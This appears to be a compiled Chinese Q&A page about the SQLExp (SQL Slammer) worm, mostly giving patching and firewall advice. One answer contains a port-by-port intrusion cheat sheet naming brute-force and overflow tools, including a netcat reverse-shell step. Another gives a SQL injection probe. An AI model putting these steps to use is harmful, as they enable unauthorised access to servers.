sqlexp
㈠ 為什麼我的電腦老是被sqlExp攻擊
SQLExp攻擊是「蠕蟲王」蠕蟲文檔:
病毒名稱:Worm.SQLexp.376
危險級別:中
破壞性:中
傳播速度:高
病毒特徵:該蠕蟲攻擊安裝有Microsoft
SQL
的NT系列伺服器,該病毒嘗試探測被攻擊機器的1434/udp埠,如果探測成功,則發送376個位元組的蠕蟲代碼。1434/udp埠為Microsoft
SQL開放埠。該埠在未打補丁的SQL
Server平台上存在緩沖區溢出漏洞,使蠕蟲的後續代碼能夠得以機會在被攻擊機器上運行進一步傳播。
病毒查殺防護
1,直接下載微軟指定的補丁程序
或者
安裝Microsoft
SQL
Server
2000
SP3。
2,在防火牆或者路由器上阻塞外部對內的和內部對外的UDP/1434埠的訪問。
3,如果由於DoS導致系統反映慢,可先斷開連接,然後在Windows任務管理器里強行終止進程SqlServr.exe,打上相應補丁並重新啟動服務.
不必去微軟官方網下載,太麻煩了。
建議您下載個「騎虎360安全衛士」。
其中有下載補丁的功能,還能伴您查殺惡意軟體和流行木馬。
非常好用!
㈡ 怎樣防止sqlexp病毒
SQLExp攻擊是什麼攻擊?
「蠕蟲王」蠕蟲文檔:
病毒名稱:Worm.SQLexp.376
危險級別:中
破壞性:中
傳播速度:高
病毒特徵:該蠕蟲攻擊安裝有Microsoft SQL 的NT系列伺服器,該病毒嘗試探測被攻擊機器的1434/udp埠,如果探測成功,則發送376個位元組的蠕蟲代碼。1434/udp埠為Microsoft SQL開放埠。該埠在未打補丁的SQL Server平台上存在緩沖區溢出漏洞,使蠕蟲的後續代碼能夠得以機會在被攻擊機器上運行進一步傳播。
病毒查殺防護
1,直接下載微軟指定的補丁程序 或者 安裝Microsoft SQL Server 2000 SP3。
2,在防火牆或者路由器上阻塞外部對內的和內部對外的UDP/1434埠的訪問。
3,如果由於DoS導致系統反映慢,可先斷開連接,然後在Windows任務管理器里強行終止進程SqlServr.exe,打上相應補丁並重新啟動服務.
㈢ 怎樣應對SQLExp攻擊
只開放必要的埠,關閉其餘埠.因為在系統安裝好後預設情況下,一般都有預設的埠對外開放, 黑客就會利用掃描工具掃描那些埠可以利用,這對安全是一個嚴重威脅。 埠 協議 應用程序 21 TCP FTP 25 TCP SMTP 53 TCP DNS 80 TCP HTTP SERVER 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 6(非埠) IP協議 8(非埠) IP協議 將下面的埠關閉 TCP 21 22 23 25 TCP SMTP 53 TCP DNS 80 135 epmap 138 [沖擊波] 139 smb 445 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b 1026 DCE/12345778-1234-abcd-ef00-0123456789ac 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 3389 4444[沖擊波] 4489 UDP 67[沖擊波] 137 netbios-ns 161 An SNMP Agent is running/ Default community names of the SNMP Agent 埠入侵: 1. 1433埠入侵 scanport.exe 查有1433的機器 SQLScanPass.exe 進行字典暴破(字典是關鍵) 最後SQLTools.exe入侵 對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠 (以上反向的,測試成功) sqlhelloz.exe 入侵ip 1433 (這個是正向連接) 2. 4899埠入侵 用4899過濾器.exe,掃描空口令的機器 3. 3899的入侵 對很早的機器,可以試試3389的溢出(win3389ex.exe) 對2000的機器,可以試試字典暴破。(tscrack.exe) 4. 80入侵 對sp3以前的機器,可以用webdav入侵; 對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL進行注入。(小榕的注入軟體)。 5. serv-u入侵(21埠) 對5. 004及以下系統,可用溢出入侵。(serv5004.exe) 對5.1.0.0及以下系統,可用本地提升許可權。(servlocal.exe) 對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs) 輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs 6. 554埠 用real554.exe入侵。 7. 6129埠 用DameWare6129.exe入侵。 8. 系統漏洞 利用135、445埠,用ms03026、ms03039、ms03049、ms04011漏洞, 進行溢出入侵。 9. 3127等埠 可以利用doom病毒開的埠,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵軟體入侵(WINNTAutoAttack.exe)。
㈣ 什麼叫SQLEXP攻擊啊
據說
這是一個很老的病毒了,名字叫蠕蟲王(SQLexp)。
傳播方式:內存駐留,無文件實體。
破壞性:耗盡系統資源,造成拒絕服務式攻擊,癱瘓整個網路。
受攻擊范圍:與感染主機同子網的所有機器。
傳播速度:使用廣播數據包一次攻擊255台機器,極快。
傳播到全球范圍所費時間:五小時內
蠕蟲王蠕蟲病毒僅在內存中傳播,沒有文件載體,其長度僅有376位元組。但其傳播速度極快,且使用廣播數據包方式發送自身代碼,每次均攻擊子網中所有可能存在機器
也就是說明無論系統是否有SQL它都會攻擊的。
我記得這個病毒好象對沒有SQL的計算機只是做個「掛接」有點象醫學上小腸子里的蛔蟲掛在繁殖,計算機就是掛你計算機的後門埠去攻擊其他計算機。
㈤ sql注入的exp是什麼意思
Exp(exploit) 指實際利用漏洞的例子
一般比poc(proof of concept)更..實際點
㈥ 急急急~~電腦高手進.SQLExp病毒是怎麼回事
SQLEXP是「蠕蟲王」
「蠕蟲王」蠕蟲文檔:
病毒名稱:Worm.SQLexp.376
危險級別:中
破壞性:中
傳播速度:高
病毒特徵:蠕蟲王蠕蟲病毒僅在內存中傳播,沒有文件載體,其長度僅有376位元組。但其傳播速度極快,且使用廣播數據包方式發送自身代碼,每次均攻擊子網中所有可能存在機器。該蠕蟲攻擊安裝有Microsoft SQL 的NT系列伺服器,該病毒嘗試探測被攻擊機器的1434/udp埠,如果探測成功,則發送376個位元組的蠕蟲代碼。1434/udp埠為Microsoft SQL開放埠。該埠在未打補丁的SQL Server平台上存在緩沖區溢出漏洞,使蠕蟲的後續代碼能夠得以機會在被攻擊機器上運行進一步傳播。由於蠕蟲王並不對是否已經侵入系統作判定,所以其不停的入侵將會造成拒絕服務式攻擊,從而導致被攻擊機器因癱瘓而停止服務,危害極為驚人。
歷來以對數據保護完整性著稱的SQL Server資料庫居然也存在漏洞,並被黑客利用,這大大出乎人們的意料之外。2003年1月25日爆發的Win32.SQLExp.Worm蠕蟲病毒帶給我們的啟示是多方面的。歸根結底,這又是一次由微軟系統的漏洞引發的互聯網危機。
趨勢科技總裁張明正先生曾經預言:全球每18個月就會有一種影響巨大的惡性病毒發生。2003年1月25日爆發的影響全球80%網民上網的Win32.SQLExp.Worm蠕蟲病毒,相距2001年7月份給全球信息系統帶來深重災難、並從此改寫病毒發展歷史的紅色代碼和Nimda病毒,正好整整18個月!
SQLExp曾經導致中國網路在2003年大面積癱瘓,專殺工具沒什麼,打好補丁就可以了。
相關的微軟補丁下載地址為:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602
㈦ 金山網鏢攔截針對本機的SQLExp攻擊是什麼意思
是掃描~~~~
現在的入侵都是批量式入侵,沒有誰會跟一台電腦過不去,大家基本上都是開著掃描器掃描一個地區的網路,從中挑選可以入侵的計算機,所以你不用擔心,這種所謂的「攻擊」ZA防火牆一天可以攔截上萬次。
你的金山攔截的是針對SQL這款資料庫管理軟體的掃描,也就是1433埠掃描,你安裝了防火牆,如果你沒有安裝SQL的話肯定沒問題。放心吧~~~
㈧ SQLExp攻擊
SQLExp攻擊
即利用 構造的sql語句進行攻擊/溢出,常見的方式有:窮舉,暴庫 等等。都是利用sql的部分敏感語句過濾不嚴格造成的。
假如你裝了sql 並開了1433,就可以通過命令:sql.exe 你的IP
如果成功溢出的話,會反回一個shell,就像在你的電腦里使用cmd 里的操作一樣!
窮舉法例如:http://**************************code=1and1=1或者or 1=1
因為1=1永遠成立 返回正常頁面和不正常頁面的差別就可以判斷code是不是=1
這是非常笨的方法 但是原理一樣。(詳細步驟不便在此講明)
至於你所說的 你如果是PC的話,沒什麼事,那隻是黑客進行大范圍掃描,偶爾掃過你的機器而已。但是你要是伺服器的話就小心了